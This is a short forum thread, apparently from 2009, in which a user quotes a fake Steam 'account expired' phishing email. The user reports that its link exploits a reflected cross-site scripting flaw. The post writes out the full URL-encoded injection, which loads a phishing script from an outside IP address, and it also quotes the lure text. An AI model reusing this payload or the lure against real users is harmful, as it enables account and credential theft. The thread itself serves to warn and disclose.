[webdevil]

I got a couple of emails in the past few days saying my steam account got expired and I needed to renew it.
Well, I am not even sure if I have a steam account :D

Quote

fromSteam <support@steam.com>
tow3bd3vil@gmail.com

dateTue, Nov 3, 2009 at 3:20 AM
subjectYour Steam account has expired

hide details Nov 3 (2 days ago)


- Hide quoted text -
Dear Member,
Your Steam account has expired.
You must renew it immediately or your account will be closed.
If you intend to use this service in the future, you must take action at once!
To continue click here,login to your Steam account and follow the steps.
Thanks for helping us maintain the security of your account.
The Steam Support Team
http://www.steampowered.com

This notification has been sent to the email address associated with your Steam account.
For information on Valve's privacy policy, visit http://www.valvesoft...om/privacy.htm.
This email message was auto-generated. Please do not respond.
VALVE © Valve Corporation. All rights reserved. All trademarks are property of their respective owners in the US and other countries.

When I checked the link, it is taking advantage of a cross site scripting flaw. Which pointed to
/http://92.241.190.202/~faaaaaaa/phising/steam/iframe.js
The url seems to be dead for now. But the vulnerability hasn't been corrected.

The vulnerability lies here.
/https://cafe.steampowered.com/directory.php?country=AL&state=%27%3E%3Cscript%20src%3Dhttp%3A%2F%2F92.241.190.202%2F~faaaaaaa%2Fphising%2Fsteam%2Fiframe.js%3E%3C%2Fscript%3E

[Ender]

Probably someone probed it already :C, it was posted around few "places" hehe. There was paypal phishing page also there was another "account shop" site. Who ever the phisher was was not very bright :P